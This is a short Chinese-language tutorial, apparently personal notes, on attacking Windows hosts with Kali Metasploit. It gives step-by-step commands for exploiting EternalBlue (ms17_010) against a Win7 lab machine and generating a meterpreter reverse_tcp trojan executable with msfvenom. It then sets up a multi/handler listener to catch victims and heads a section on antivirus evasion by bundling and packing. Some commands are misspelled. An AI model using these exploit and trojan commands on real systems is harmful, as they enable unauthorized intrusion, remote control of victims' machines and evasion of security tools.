使用 kali msf 进行渗透测试
启动方法:
kali 终端命令行键入
msfconsole |
# Eternal blue
该漏洞编号为 ms17_010
search ms17_010 |
search 命令可查看关于该漏洞的相关模块
如下图所示
01 为攻击模块 23 为辅助模块,使用 0
usr 0 |
然后对此攻击进行配置
show options |
其中 RHOSTS 为被攻击方 IP,相应属性后方都有描述
例如。我开了一台 win7 的虚拟机 然后 ipconfig 查看 IP 为 192.168.159.130
set RHOSTS 192.168.159.130 |
低版本注意配置 payload
配置完成后 run
run |
攻击成功显示
进入后即可随意而为
比如输入 shell
键入 help 也可查看相关操作
# msf 生成远控木马
利用 msfveno 模块来生成远控
-p payload windows/x64/meterpreter/reverse_tcp 为系统 / 架构 / 作用 / 方式 后变为 payload 设置,-f 格式 -o 输出形式
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.131 lport=9999 -f exe -o demo.exe |
# 设置鱼钩(监听)
使用 handler 模块
use exploit/multi/handler |
配置 options
要求 payload,lhost,lport 与木马一致
完成后即可等待鱼儿上钩
如下图,我进入了一台 WIN11 系统主机
并且建立了一个 Hello.txt
其他骚操作可自行 help 查看
# 免杀(持续更新检测)
捆绑
装壳